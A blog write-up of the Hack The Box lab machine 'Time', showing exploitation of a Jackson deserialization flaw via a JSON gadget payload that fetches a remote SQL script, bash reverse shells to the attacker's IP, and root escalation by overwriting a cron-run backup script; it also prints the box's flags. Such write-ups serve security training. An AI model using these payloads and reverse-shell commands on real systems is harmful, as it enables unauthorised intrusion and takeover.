22nd June 2021
Hack The Box Time Write-Up by T13nn3s

Hack The Box – 10.10.10.214 – Time

You’re waiting for a train. A train that’ll take you far away. You know where you hope this train will take you. But you can’t know for sure. Yet it doesn’t matter. Now, tell me why?

Cobb

About Time

In this post, I’m writing a write-up for the machine Time from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills.

Time is a ‘Medium’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15, and submitting the root flag your points will be raised by 30.

Foothold
After the port scan with Nmap, I discovered two open ports: 22/tcp (SSH), and 80/tcp (HTTP). I started with the enumeration of the web service is running a website with a JSON beautifier. After some testing, the website returns a Java error message, which reveals a vulnerability. After some searching on the internet, I find that this website is vulnerable to a Remote Code Execution, known as CVE-2020-12384. After exploiting this vulnerability I could establish a reverse shell to my machine.

User
After exploiting the CVE-2020-12384 vulnerability I had a Reverse Shell as the user ‘pericles’. There was nothing more to do than only capture the user-flag.

Root
The enumeration script ‘linpeas.sh’ discovered the file ‘/usr/bin/timer_backup.sh’. This file is running as root and is making a back-up of the location ‘/var/www/html’ to ‘/root/backup.zip’. The user account pericles had no privileges to modify this file, but with the ‘echo’ command, I was able to insert a reverse shell command in the ‘timer_backup.sh’ and the cronjob is running this script, and the reverse shell as root is established. Grabbing the root password is the last step to root this box.

Machine Info

Hack The Box Time Write-Up by T13nn3s
Hack The Box Time Write-Up by T13nn3s
Hack The Box Time Machine IP and makers
Hack The Box Time Machine IP and makers

Recon

Port scan

As always, I start the machine with a Nmap port scan.

~$ nmap -sV -sC -oA ./nmap/10.10.10.214 10.10.10.214

The results.

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.78 seconds

This machine has two open ports. 22/tcp (SSH) and 80/tcp (HTTP), with the HTTP title Online JSON parser. Let’s start to enumerate web service.

Enumaration Web Server

I visited the website on the URL http://10.10.10.214. I end up on a webpage with an online JSON beautifier and validator.

Hack The Box Time Online JSON beautifier and validator
http://10.10.10.214

In the dropdown menu I got two options: ‘Beautify’ and ‘Validate (beta!)’. When I fill in a random string on Beautify, I get the response ‘null’, when I full in a random JSON formatted text, it got’s beautified. Ok, that looks logical. When I capture the response with Burp, nothing odd yet.

When I enter a random string with the ‘Validate (beta!)’ option in the dropdown menu, the response is very odd.

Hack The Box Time Java exception error
Validation failed

The error message:

Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'test': was expecting 'null', 'true', 'false' or NaN

It’s a JSON-validator, why do I receive an ‘Unhandled Java exception’ message? It the back-end using Java, I think it is. Only I think this error message should never have reached the front-end. A search on the internet leads me to CVE-2019-12384 vulnerability.

Exploitation

CVE-2019-12384

In fact, this is a Server-Side Request Forgery (SSRF) vulnerability that leads to a Remote Code Execution (RCE). The context can be found in this article: Jackson gadgets – Anatomy of a vulnerability. It’s a deserialization vulnerability. Deserialization is a process when a string got’s converted back to its original JSON-object, there is an explanation here: What is deserialize and serialize in JSON?

I have changed the payload a bit, from Ruby to actual JSON, to get it working through the website.

[
    "ch.qos.logback.core.db.DriverManagerConnectionSource",
    {
        "url": "jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.23:8000/inject.sql'"
    }
]

On my attacker machine, I created a folder with the name ‘http’ and added the file ‘inject.sql’ in that folder with a Reverse shell payload.

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('/bin/bash -c "bash -i >& /dev/tcp/10.10.14.23/4444 0>&1"')

Let’s start the exploit by filling in the ‘JSON payload’ in the textbox area and click on ‘Process.’ If everything is working well, the page keeps loading, because that means that the payload got’s executed.

Hack The Box Time exploit CVE-2019-12384

The payload with the reverse shell payload, is being downloaded.

time/http$ python -m SimpleHTTPServer 8000 
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.214 - - [09/Nov/2020 21:14:42] "GET /inject.sql HTTP/1.1" 200 -

The reverse shell is established.

~$ netcat -lvvp 4444
Listening on any address 4444 (krb524)
Connection from 10.10.10.214:49514
bash: cannot set terminal process group (910): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/var/www/html$ 

Let’s upgrade the shell and check as which user I’m logged in right now.

[email protected]:/var/www/html$ which python3
which python3
/usr/bin/python3
[email protected]:/var/www/html$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:/var/www/html$ whoami
whoami
pericles
[email protected]:/var/www/html$

Well, here is no flag here. Let’s move to the user home folder an grab the flag.

[email protected]:/var/www/html$ cat user.txt
cat user.txt
cat: user.txt: No such file or directory
[email protected]:/var/www/html$ ls 
ls
css  fonts  images  index.php  js  vendor
[email protected]:/var/www/html$ cd /home
cd /home
[email protected]:/home$ ls
ls
pericles
[email protected]:/home$ cd pericles
cd pericles
[email protected]:/home/pericles$ cat user.txt
cat user.txt
b65621cd7cb8ed20a14f8ac8d376d63b
[email protected]:/home/pericles$

Got the flag. Net step: Privilege Escalation.

Privilege Escalation

Enumeration

After downloading linpeas.sh to the machine and run it, it has found something interesting: a bash-script named ‘timer_backup.sh’. As the name of this box is ‘Time’, it’s no coincidence.

[+] Interesting GROUP writable files (not in Home) (max 500)                                                                                                                             
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files                                                                                                           
  Group pericles:                                                                                                                                                                        
/usr/bin/timer_backup.sh 

Let’s read the file.

[email protected]:/home/pericles$ cat /usr/bin/timer_backup.sh
cat /usr/bin/timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip
[email protected]:/home/pericles$

This file is compressing everything in location ‘/var/www/html’ in the file named ‘website.bak.zip’ and move it to the location ‘/root/backup.zip’. This file is writing to the root directory, so it has to be running as root. I could try check it with pspy, but let just modify the file, but I do not have the permission.

Own Time (on time)

After som thinking. Why not echo’ing into the file? I’ve started a netcat listener on port 5555.

[email protected]:/usr/bin$ echo "bash -i >& /dev/tcp/10.10.14.23/5555 0>&1" > timer_backup.sh

Bam! Reverse shell established and directly gone! This box is called ‘Time’. So, after some tries and grab quickly the root flag.

Connection from 10.10.10.214:54776
bash: cannot set terminal process group (46667): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/# whoami
[email protected]:/# cat /root/root.txt
cat /root/root.txt
3e56626bc8ef0b4495e9952eb4bc3ca4

Did you liked this write-up? Please consider to spending a respect point: https://app.hackthebox.eu/profile/224856.

Happy hacking!

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.

View all posts by T13nn3s →

Leave a Reply

Your email address will not be published. Required fields are marked *